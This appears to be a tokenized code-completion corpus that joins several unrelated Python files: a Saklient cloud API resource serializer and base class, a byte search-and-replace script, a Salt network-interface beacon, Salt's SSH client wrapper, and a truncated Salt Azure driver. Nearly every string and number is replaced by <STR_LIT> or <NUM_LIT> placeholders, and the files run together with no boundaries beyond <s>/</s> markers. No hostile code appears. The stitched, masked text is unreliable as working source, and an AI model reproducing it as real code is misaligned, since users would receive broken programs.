            Util.set_by_path(ret, "<STR_LIT>", self.m_clazz)
        else:
            if self.is_new:
                missing.append("<STR_LIT>")
        if withClean or self.n_name:
            Util.set_by_path(ret, "<STR_LIT:Name>", self.m_name)
        else:
            if self.is_new:
                missing.append("<STR_LIT:name>")
        if withClean or self.n_description:
            Util.set_by_path(ret, "<STR_LIT>", self.m_description)
        if withClean or self.n_tags:
            Util.set_by_path(ret, "<STR_LIT>", [])
            for r1 in self.m_tags:
                v = None
                v = r1
                # Appends to the list installed by set_by_path just above.
                (ret["<STR_LIT>"] if "<STR_LIT>" in ret else None).append(v)
        if withClean or self.n_icon:
            # Full serialization when cleaning; otherwise just the id stub.
            Util.set_by_path(ret, "<STR_LIT>", (None if self.m_icon is None else self.m_icon.api_serialize(withClean)) if withClean else ({
                '<STR_LIT>': "<STR_LIT:0>"
            } if self.m_icon is None else self.m_icon.api_serialize_id()))
        if withClean or self.n_plan_id:
            Util.set_by_path(ret, "<STR_LIT>", self.m_plan_id)
        else:
            if self.is_new:
                missing.append("<STR_LIT>")
        if withClean or self.n_ifaces:
            Util.set_by_path(ret, "<STR_LIT>", [])
            for r2 in self.m_ifaces:
                v = None
                v = (None if r2 is None else r2.api_serialize(withClean)) if withClean else ({
                    '<STR_LIT>': "<STR_LIT:0>"
                } if r2 is None else r2.api_serialize_id())
                (ret["<STR_LIT>"] if "<STR_LIT>" in ret else None).append(v)
        if withClean or self.n_raw_annotation:
            Util.set_by_path(ret, "<STR_LIT>", self.m_raw_annotation)
        else:
            if self.is_new:
                missing.append("<STR_LIT>")
        if withClean or self.n_raw_settings:
            Util.set_by_path(ret, "<STR_LIT>", self.m_raw_settings)
        if withClean or self.n_raw_settings_hash:
            Util.set_by_path(ret, "<STR_LIT>", self.m_raw_settings_hash)
        if withClean or self.n_status:
            Util.set_by_path(ret, "<STR_LIT>", self.m_status)
        if withClean or self.n_service_class:
            Util.set_by_path(ret, "<STR_LIT>", self.m_service_class)
        if withClean or self.n_availability:
            Util.set_by_path(ret, "<STR_LIT>", self.m_availability)
        if withClean or self.n_swytch_id:
            Util.set_by_path(ret, "<STR_LIT>", self.m_swytch_id)
        if len(missing) > <NUM_LIT:0>:
            raise SaklientException("<STR_LIT>", "<STR_LIT>" + "<STR_LIT:U+002CU+0020>".join(missing))
        return ret
<s> import six <EOL> from ... util import Util <EOL> from . . client import Client <EOL> from ... errors . httpexception import HttpException <EOL> import re <EOL> import saklient <EOL> str = six . text_type <EOL> class Resource ( object ) : <EOL> def get_client ( self ) : <EOL> return self . _client <EOL> client = property ( get_client , None , None ) <EOL> def set_param ( self , key , value ) : <EOL> Util . validate_type ( key , "<STR_LIT:str>" ) <EOL> self . _query [ key ] = value <EOL> def _api_path ( self ) : <EOL> return None <EOL> def _root_key ( self ) : <EOL> return None <EOL> def _root_key_m ( self ) : <EOL> return None <EOL> def _class_name ( self ) : <EOL> return None <EOL> def _id ( self ) : <EOL> return None <EOL> def __init__ ( self , client ) : <EOL> Util . validate_type ( client , "<STR_LIT>" ) <EOL> self . _client = client <EOL> self . _query = { } <EOL> def _on_before_save ( self , query ) : <EOL> { } <EOL> def _on_before_api_deserialize ( self , r , root ) : <EOL> { } <EOL> def _on_after_api_deserialize ( self , r , root ) : <EOL> { } <EOL> def _on_before_api_serialize ( self , withClean ) : <EOL> Util . validate_type ( withClean , "<STR_LIT:bool>" ) <EOL> def _on_after_api_serialize ( self , r , withClean ) : <EOL> Util . validate_type ( withClean , "<STR_LIT:bool>" ) <EOL> def api_deserialize_impl ( self , r ) : <EOL> { } <EOL> def api_deserialize ( self , obj , wrapped = False ) : <EOL> Util . validate_type ( wrapped , "<STR_LIT:bool>" ) <EOL> root = None <EOL> record = None <EOL> rkey = self . _root_key ( ) <EOL> if obj is not None : <EOL> if not wrapped : <EOL> if rkey is not None : <EOL> root = { } <EOL> root [ rkey ] = obj <EOL> record = obj <EOL> else : <EOL> root = obj <EOL> record = ( obj [ rkey ] if rkey in obj else None ) <EOL> self . _on_before_api_deserialize ( record , root ) <EOL> self . api_deserialize_impl ( record ) <EOL> self . 
_on_after_api_deserialize ( record , root ) <EOL> def api_serialize_impl ( self , withClean = False ) : <EOL> Util . validate_type ( withClean , "<STR_LIT:bool>" ) <EOL> return None <EOL> def api_serialize ( self , withClean = False ) : <EOL> Util . validate_type ( withClean , "<STR_LIT:bool>" ) <EOL> self . _on_before_api_serialize ( withClean ) <EOL> ret = self . api_serialize_impl ( withClean ) <EOL> self . _on_after_api_serialize ( ret , withClean ) <EOL> return ret <EOL> def api_serialize_id ( self ) : <EOL> id = self . _id ( ) <EOL> if id is None : <EOL> return None <EOL> r = { } <EOL> r [ "<STR_LIT>" ] = id <EOL> return r <EOL> def normalize_field_name ( self , name ) : <EOL> Util . validate_type ( name , "<STR_LIT:str>" ) <EOL> name = re . sub ( '<STR_LIT>' , lambda m : '<STR_LIT:_>' + m . group ( <NUM_LIT:0> ) . lower ( ) , name ) <EOL> return name <EOL> def _save ( self ) : <EOL> r = self . api_serialize ( ) <EOL> query = self . _query <EOL> self . _query = { } <EOL> keys = query . keys ( ) <EOL> for k in keys : <EOL> v = ( query [ k ] if k in query else None ) <EOL> r [ k ] = v <EOL> method = "<STR_LIT:POST>" if self . is_new else "<STR_LIT>" <EOL> path = self . _api_path ( ) <EOL> if not self . is_new : <EOL> path += "<STR_LIT:/>" + Util . url_encode ( self . _id ( ) ) <EOL> q = { } <EOL> q [ self . _root_key ( ) ] = r <EOL> self . _on_before_save ( q ) <EOL> result = self . _client . request ( method , path , q ) <EOL> self . api_deserialize ( result , True ) <EOL> return self <EOL> def destroy ( self ) : <EOL> if self . is_new : <EOL> return <EOL> path = self . _api_path ( ) + "<STR_LIT:/>" + Util . url_encode ( self . _id ( ) ) <EOL> self . request_retry ( "<STR_LIT>" , path ) <EOL> def _reload ( self ) : <EOL> id = self . _id ( ) <EOL> if id is not None : <EOL> result = self . request_retry ( "<STR_LIT:GET>" , self . _api_path ( ) + "<STR_LIT:/>" + Util . url_encode ( id ) ) <EOL> self . 
api_deserialize ( result , True ) <EOL> return self <EOL> def exists ( self ) : <EOL> query = { } <EOL> Util . set_by_path ( query , "<STR_LIT>" , [ self . _id ( ) ] ) <EOL> Util . set_by_path ( query , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> result = self . request_retry ( "<STR_LIT:GET>" , self . _api_path ( ) , query ) <EOL> cnt = ( result [ "<STR_LIT>" ] if "<STR_LIT>" in result else None ) <EOL> return cnt == <NUM_LIT:1> <EOL> def dump ( self ) : <EOL> return self . api_serialize ( True ) <EOL> @ staticmethod <EOL> def create_with ( className , client , obj , wrapped = False ) : <EOL> Util . validate_type ( className , "<STR_LIT:str>" ) <EOL> Util . validate_type ( client , "<STR_LIT>" ) <EOL> Util . validate_type ( wrapped , "<STR_LIT:bool>" ) <EOL> a = [ client , obj , wrapped ] <EOL> return Util . create_class_instance ( "<STR_LIT>" + className , a ) <EOL> def request_retry ( self , method , path , query = None , retryCount = <NUM_LIT:5> , retrySleep = <NUM_LIT:5> ) : <EOL> Util . validate_type ( method , "<STR_LIT:str>" ) <EOL> Util . validate_type ( path , "<STR_LIT:str>" ) <EOL> Util . validate_type ( retryCount , "<STR_LIT:int>" ) <EOL> Util . validate_type ( retrySleep , "<STR_LIT:int>" ) <EOL> ret = None <EOL> while ( <NUM_LIT:1> < retryCount ) : <EOL> isOk = False <EOL> try : <EOL> ret = self . _client . request ( method , path , query ) <EOL> isOk = True <EOL> except saklient . errors . httpexception . HttpException : <EOL> isOk = False <EOL> if isOk : <EOL> retryCount = - <NUM_LIT:1> <EOL> else : <EOL> retryCount -= <NUM_LIT:1> <EOL> Util . sleep ( retrySleep ) <EOL> if retryCount == <NUM_LIT:0> : <EOL> ret = self . _client . request ( method , path , query ) <EOL> return ret </s>
<s> from __future__ import print_function <EOL> import sys , getopt <EOL> def display_help ( ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def main ( argv ) : <EOL> target = '<STR_LIT>' <EOL> search = '<STR_LIT>' <EOL> replace = '<STR_LIT:..>' <EOL> try : <EOL> opts , args = getopt . getopt ( argv , "<STR_LIT>" , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> except getopt . GetoptError : <EOL> display_help ( ) <EOL> for opt , arg in opts : <EOL> if opt == '<STR_LIT>' : <EOL> display_help ( ) <EOL> elif opt in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> target = arg <EOL> elif opt in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> search = arg <EOL> elif opt in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> replace = arg <EOL> if target == '<STR_LIT>' : <EOL> display_help ( ) <EOL> f = open ( target , '<STR_LIT:rb>' ) . read ( ) <EOL> f = f . replace ( search , replace ) <EOL> f = f . replace ( search . lower ( ) , replace ) <EOL> open ( target , '<STR_LIT:wb>' ) . write ( f ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> try : <EOL> from pyroute2 . ipdb import IPDB <EOL> HAS_PYROUTE2 = True <EOL> except ImportError : <EOL> HAS_PYROUTE2 = False <EOL> import ast <EOL> import re <EOL> import salt . loader <EOL> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> __virtual_name__ = '<STR_LIT>' <EOL> ATTRS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:address>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> LAST_STATS = { } <EOL> IP = IPDB ( ) <EOL> class Hashabledict ( dict ) : <EOL> '''<STR_LIT>''' <EOL> def __hash__ ( self ) : <EOL> return hash ( tuple ( sorted ( self . items ( ) ) ) ) <EOL> def __virtual__ ( ) : <EOL> if HAS_PYROUTE2 : <EOL> return __virtual_name__ <EOL> return False <EOL> def validate ( config ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( config , dict ) : <EOL> return False , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> for item in config : <EOL> if item == '<STR_LIT>' : <EOL> continue <EOL> if not isinstance ( config [ item ] , dict ) : <EOL> return False , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> if not all ( j in ATTRS for j in config [ item ] ) : <EOL> return False , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return True , '<STR_LIT>' <EOL> def _copy_interfaces_info ( interfaces ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> for interface in interfaces : <EOL> _interface_attrs_cpy = set ( ) <EOL> for attr in ATTRS : <EOL> attr_dict = Hashabledict ( ) <EOL> attr_dict [ attr ] = repr ( interfaces [ interface ] [ attr ] ) <EOL> _interface_attrs_cpy . 
add ( attr_dict ) <EOL> ret [ interface ] = _interface_attrs_cpy <EOL> return ret <EOL> def beacon ( config ) : <EOL> '''<STR_LIT>''' <EOL> ret = [ ] <EOL> interfaces = [ ] <EOL> expanded_config = { } <EOL> global LAST_STATS <EOL> coalesce = False <EOL> _stats = _copy_interfaces_info ( IP . by_name ) <EOL> if not LAST_STATS : <EOL> LAST_STATS = _stats <EOL> if '<STR_LIT>' in config and config [ '<STR_LIT>' ] : <EOL> coalesce = True <EOL> changes = { } <EOL> for item in config : <EOL> if item == '<STR_LIT>' : <EOL> continue <EOL> if item in _stats : <EOL> interfaces . append ( item ) <EOL> else : <EOL> interface_regexp = item . replace ( '<STR_LIT:*>' , '<STR_LIT>' ) <EOL> for interface in _stats : <EOL> match = re . search ( interface_regexp , interface ) <EOL> if match : <EOL> interfaces . append ( match . group ( ) ) <EOL> expanded_config [ match . group ( ) ] = config [ item ] <EOL> if expanded_config : <EOL> config . update ( expanded_config ) <EOL> for interface in interfaces : <EOL> _send_event = False <EOL> _diff_stats = _stats [ interface ] - LAST_STATS [ interface ] <EOL> _ret_diff = { } <EOL> if _diff_stats : <EOL> _diff_stats_dict = { } <EOL> LAST_STATS [ interface ] = _stats [ interface ] <EOL> for item in _diff_stats : <EOL> _diff_stats_dict . update ( item ) <EOL> for attr in config [ interface ] : <EOL> if attr in _diff_stats_dict : <EOL> config_value = None <EOL> if config [ interface ] [ attr ] and '<STR_LIT>' in config [ interface ] [ attr ] : <EOL> config_value = config [ interface ] [ attr ] [ '<STR_LIT>' ] <EOL> new_value = ast . literal_eval ( _diff_stats_dict [ attr ] ) <EOL> if not config_value or config_value == new_value : <EOL> _send_event = True <EOL> _ret_diff [ attr ] = new_value <EOL> if _send_event : <EOL> if coalesce : <EOL> changes [ interface ] = _ret_diff <EOL> else : <EOL> ret . append ( { '<STR_LIT>' : interface , '<STR_LIT>' : interface , '<STR_LIT>' : _ret_diff } ) <EOL> if coalesce and changes : <EOL> grains_info = salt . 
loader . grains ( __opts__ , True ) <EOL> __grains__ . update ( grains_info ) <EOL> ret . append ( { '<STR_LIT>' : '<STR_LIT:result>' , '<STR_LIT>' : changes } ) <EOL> return ret </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> import copy <EOL> import logging <EOL> import salt . config <EOL> import salt . syspaths as syspaths <EOL> from salt . exceptions import SaltClientError <EOL> log = logging . getLogger ( __name__ ) <EOL> class SSHClient ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , <EOL> c_path = os . path . join ( syspaths . CONFIG_DIR , '<STR_LIT>' ) , <EOL> mopts = None ) : <EOL> if mopts : <EOL> self . opts = mopts <EOL> else : <EOL> if os . path . isdir ( c_path ) : <EOL> log . warning ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> self . __class__ . __name__ , c_path <EOL> ) <EOL> ) <EOL> self . opts = salt . config . client_config ( c_path ) <EOL> def _prep_ssh ( <EOL> self , <EOL> tgt , <EOL> fun , <EOL> arg = ( ) , <EOL> timeout = None , <EOL> expr_form = '<STR_LIT>' , <EOL> kwarg = None , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> opts = copy . deepcopy ( self . opts ) <EOL> opts . update ( kwargs ) <EOL> if timeout : <EOL> opts [ '<STR_LIT>' ] = timeout <EOL> arg = salt . utils . args . condition_input ( arg , kwarg ) <EOL> opts [ '<STR_LIT>' ] = [ fun ] + arg <EOL> opts [ '<STR_LIT>' ] = expr_form <EOL> opts [ '<STR_LIT>' ] = tgt <EOL> opts [ '<STR_LIT>' ] = arg <EOL> return salt . client . ssh . SSH ( opts ) <EOL> def cmd_iter ( <EOL> self , <EOL> tgt , <EOL> fun , <EOL> arg = ( ) , <EOL> timeout = None , <EOL> expr_form = '<STR_LIT>' , <EOL> ret = '<STR_LIT>' , <EOL> kwarg = None , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> ssh = self . _prep_ssh ( <EOL> tgt , <EOL> fun , <EOL> arg , <EOL> timeout , <EOL> expr_form , <EOL> kwarg , <EOL> ** kwargs ) <EOL> for ret in ssh . run_iter ( jid = kwargs . get ( '<STR_LIT>' , None ) ) : <EOL> yield ret <EOL> def cmd ( <EOL> self , <EOL> tgt , <EOL> fun , <EOL> arg = ( ) , <EOL> timeout = None , <EOL> expr_form = '<STR_LIT>' , <EOL> kwarg = None , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> ssh = self . 
_prep_ssh ( <EOL> tgt , <EOL> fun , <EOL> arg , <EOL> timeout , <EOL> expr_form , <EOL> kwarg , <EOL> ** kwargs ) <EOL> final = { } <EOL> for ret in ssh . run_iter ( jid = kwargs . get ( '<STR_LIT>' , None ) ) : <EOL> final . update ( ret ) <EOL> return final <EOL> def cmd_sync ( self , low ) : <EOL> '''<STR_LIT>''' <EOL> kwargs = copy . deepcopy ( low ) <EOL> for ignore in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if ignore in kwargs : <EOL> del kwargs [ ignore ] <EOL> return self . cmd ( low [ '<STR_LIT>' ] , <EOL> low [ '<STR_LIT>' ] , <EOL> low . get ( '<STR_LIT>' , [ ] ) , <EOL> low . get ( '<STR_LIT>' ) , <EOL> low . get ( '<STR_LIT>' ) , <EOL> low . get ( '<STR_LIT>' ) , <EOL> ** kwargs ) <EOL> def cmd_async ( self , low , timeout = None ) : <EOL> '''<STR_LIT>''' <EOL> raise SaltClientError </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import copy <EOL> import logging <EOL> import pprint <EOL> import time <EOL> import yaml <EOL> import salt . config as config <EOL> from salt . exceptions import SaltCloudSystemExit <EOL> import salt . utils . cloud <EOL> HAS_LIBS = False <EOL> try : <EOL> import azure <EOL> import azure . storage <EOL> import azure . servicemanagement <EOL> from azure . common import ( AzureConflictHttpError , <EOL> AzureMissingResourceHttpError , <EOL> AzureException ) <EOL> import salt . utils . msazure <EOL> from salt . utils . msazure import object_to_dict <EOL> HAS_LIBS = True <EOL> except ImportError : <EOL> pass <EOL> __virtualname__ = '<STR_LIT>' <EOL> log = logging . getLogger ( __name__ ) <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if get_configured_provider ( ) is False : <EOL> return False <EOL> if get_dependencies ( ) is False : <EOL> return False <EOL> return __virtualname__ <EOL> def get_configured_provider ( ) : <EOL> '''<STR_LIT>''' <EOL> return config . is_provider_configured ( <EOL> __opts__ , <EOL> __active_provider_name__ or __virtualname__ , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> def get_dependencies ( ) : <EOL> '''<STR_LIT>''' <EOL> return config . check_driver_dependencies ( <EOL> __virtualname__ , <EOL> { '<STR_LIT>' : HAS_LIBS } <EOL> ) <EOL> def get_conn ( ) : <EOL> '''<STR_LIT>''' <EOL> certificate_path = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False <EOL> ) <EOL> subscription_id = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False <EOL> ) <EOL> management_host = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , <EOL> __opts__ , <EOL> search_global = False , <EOL> default = '<STR_LIT>' <EOL> ) <EOL> return azure . servicemanagement . 
ServiceManagementService ( <EOL> subscription_id , certificate_path , management_host <EOL> ) <EOL> def script ( vm_ ) : <EOL> '''<STR_LIT>''' <EOL> return salt . utils . cloud . os_script ( <EOL> config . get_cloud_config_value ( '<STR_LIT>' , vm_ , __opts__ ) , <EOL> vm_ , <EOL> __opts__ , <EOL> salt . utils . cloud . salt_config_to_yaml ( <EOL> salt . utils . cloud . minion_config ( __opts__ , vm_ ) <EOL> ) <EOL> ) <EOL> def avail_locations ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> ret = { } <EOL> locations = conn . list_locations ( ) <EOL> for location in locations : <EOL> ret [ location . name ] = { <EOL> '<STR_LIT:name>' : location . name , <EOL> '<STR_LIT>' : location . display_name , <EOL> '<STR_LIT>' : location . available_services , <EOL> } <EOL> return ret <EOL> def avail_images ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> ret = { } <EOL> for item in conn . list_os_images ( ) : <EOL> ret [ item . name ] = object_to_dict ( item ) <EOL> for item in conn . list_vm_images ( ) : <EOL> ret [ item . name ] = object_to_dict ( item ) <EOL> return ret <EOL> def avail_sizes ( call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> conn = get_conn ( ) <EOL> data = conn . list_role_sizes ( ) <EOL> ret = { } <EOL> for item in data . role_sizes : <EOL> ret [ item . 
name ] = object_to_dict ( item ) <EOL> return ret <EOL> def list_nodes ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> ret = { } <EOL> nodes = list_nodes_full ( conn , call ) <EOL> for node in nodes : <EOL> ret [ node ] = { '<STR_LIT:name>' : node } <EOL> for prop in ( '<STR_LIT:id>' , '<STR_LIT:image>' , '<STR_LIT:size>' , '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> ret [ node ] [ prop ] = nodes [ node ] . get ( prop ) <EOL> return ret <EOL> def list_nodes_full ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> ret = { } <EOL> services = list_hosted_services ( conn = conn , call = call ) <EOL> for service in services : <EOL> for deployment in services [ service ] [ '<STR_LIT>' ] : <EOL> deploy_dict = services [ service ] [ '<STR_LIT>' ] [ deployment ] <EOL> deploy_dict_no_role_info = copy . deepcopy ( deploy_dict ) <EOL> del deploy_dict_no_role_info [ '<STR_LIT>' ] <EOL> del deploy_dict_no_role_info [ '<STR_LIT>' ] <EOL> roles = deploy_dict [ '<STR_LIT>' ] <EOL> for role in roles : <EOL> role_instances = deploy_dict [ '<STR_LIT>' ] <EOL> ret [ role ] = roles [ role ] <EOL> ret [ role ] . 
update ( role_instances [ role ] ) <EOL> ret [ role ] [ '<STR_LIT:id>' ] = role <EOL> ret [ role ] [ '<STR_LIT>' ] = service <EOL> if role_instances [ role ] [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> ret [ role ] [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> elif role_instances [ role ] [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> ret [ role ] [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> else : <EOL> ret [ role ] [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> ret [ role ] [ '<STR_LIT>' ] = [ ] <EOL> ret [ role ] [ '<STR_LIT>' ] = [ ] <EOL> ret [ role ] [ '<STR_LIT>' ] = deploy_dict_no_role_info <EOL> ret [ role ] [ '<STR_LIT:url>' ] = deploy_dict [ '<STR_LIT:url>' ] <EOL> ip_address = role_instances [ role ] [ '<STR_LIT>' ] <EOL> if ip_address : <EOL> if salt . utils . cloud . is_public_ip ( ip_address ) : <EOL> ret [ role ] [ '<STR_LIT>' ] . append ( ip_address ) <EOL> else : <EOL> ret [ role ] [ '<STR_LIT>' ] . append ( ip_address ) <EOL> ret [ role ] [ '<STR_LIT:size>' ] = role_instances [ role ] [ '<STR_LIT>' ] <EOL> ret [ role ] [ '<STR_LIT:image>' ] = roles [ role ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> return ret <EOL> def list_hosted_services ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call == '<STR_LIT:action>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> ret = { } <EOL> services = conn . list_hosted_services ( ) <EOL> for service in services : <EOL> props = service . hosted_service_properties <EOL> ret [ service . service_name ] = { <EOL> '<STR_LIT:name>' : service . service_name , <EOL> '<STR_LIT:url>' : service . url , <EOL> '<STR_LIT>' : props . affinity_group , <EOL> '<STR_LIT>' : props . date_created , <EOL> '<STR_LIT>' : props . date_last_modified , <EOL> '<STR_LIT:description>' : props . description , <EOL> '<STR_LIT>' : props . extended_properties , <EOL> '<STR_LIT:label>' : props . label , <EOL> '<STR_LIT:location>' : props . 
location , <EOL> '<STR_LIT:status>' : props . status , <EOL> '<STR_LIT>' : { } , <EOL> } <EOL> deployments = conn . get_hosted_service_properties ( <EOL> service_name = service . service_name , embed_detail = True <EOL> ) <EOL> for deployment in deployments . deployments : <EOL> ret [ service . service_name ] [ '<STR_LIT>' ] [ deployment . name ] = { <EOL> '<STR_LIT>' : deployment . configuration , <EOL> '<STR_LIT>' : deployment . created_time , <EOL> '<STR_LIT>' : deployment . deployment_slot , <EOL> '<STR_LIT>' : deployment . extended_properties , <EOL> '<STR_LIT>' : deployment . input_endpoint_list , <EOL> '<STR_LIT:label>' : deployment . label , <EOL> '<STR_LIT>' : deployment . last_modified_time , <EOL> '<STR_LIT>' : deployment . locked , <EOL> '<STR_LIT:name>' : deployment . name , <EOL> '<STR_LIT>' : deployment . persistent_vm_downtime_info , <EOL> '<STR_LIT>' : deployment . private_id , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : deployment . rollback_allowed , <EOL> '<STR_LIT>' : deployment . sdk_version , <EOL> '<STR_LIT:status>' : deployment . status , <EOL> '<STR_LIT>' : deployment . upgrade_domain_count , <EOL> '<STR_LIT>' : deployment . upgrade_status , <EOL> '<STR_LIT:url>' : deployment . url , <EOL> } <EOL> for role_instance in deployment . role_instance_list : <EOL> ret [ service . service_name ] [ '<STR_LIT>' ] [ deployment . name ] [ '<STR_LIT>' ] [ role_instance . role_name ] = { <EOL> '<STR_LIT>' : role_instance . fqdn , <EOL> '<STR_LIT>' : role_instance . instance_error_code , <EOL> '<STR_LIT>' : role_instance . instance_fault_domain , <EOL> '<STR_LIT>' : role_instance . instance_name , <EOL> '<STR_LIT>' : role_instance . instance_size , <EOL> '<STR_LIT>' : role_instance . instance_state_details , <EOL> '<STR_LIT>' : role_instance . instance_status , <EOL> '<STR_LIT>' : role_instance . instance_upgrade_domain , <EOL> '<STR_LIT>' : role_instance . ip_address , <EOL> '<STR_LIT>' : role_instance . 
power_state , <EOL> '<STR_LIT>' : role_instance . role_name , <EOL> } <EOL> for role in deployment . role_list : <EOL> ret [ service . service_name ] [ '<STR_LIT>' ] [ deployment . name ] [ '<STR_LIT>' ] [ role . role_name ] = { <EOL> '<STR_LIT>' : role . role_name , <EOL> '<STR_LIT>' : role . os_version , <EOL> } <EOL> role_info = conn . get_role ( <EOL> service_name = service . service_name , <EOL> deployment_name = deployment . name , <EOL> role_name = role . role_name , <EOL> ) <EOL> ret [ service . service_name ] [ '<STR_LIT>' ] [ deployment . name ] [ '<STR_LIT>' ] [ role . role_name ] [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : role_info . availability_set_name , <EOL> '<STR_LIT>' : role_info . configuration_sets , <EOL> '<STR_LIT>' : role_info . data_virtual_hard_disks , <EOL> '<STR_LIT>' : role_info . os_version , <EOL> '<STR_LIT>' : role_info . role_name , <EOL> '<STR_LIT>' : role_info . role_size , <EOL> '<STR_LIT>' : role_info . role_type , <EOL> } <EOL> ret [ service . service_name ] [ '<STR_LIT>' ] [ deployment . name ] [ '<STR_LIT>' ] [ role . role_name ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : role_info . os_virtual_hard_disk . disk_label , <EOL> '<STR_LIT>' : role_info . os_virtual_hard_disk . disk_name , <EOL> '<STR_LIT>' : role_info . os_virtual_hard_disk . host_caching , <EOL> '<STR_LIT>' : role_info . os_virtual_hard_disk . media_link , <EOL> '<STR_LIT>' : role_info . os_virtual_hard_disk . os , <EOL> '<STR_LIT>' : role_info . os_virtual_hard_disk . source_image_name , <EOL> } <EOL> return ret <EOL> def list_nodes_select ( conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if not conn : <EOL> conn = get_conn ( ) <EOL> return salt . utils . cloud . 
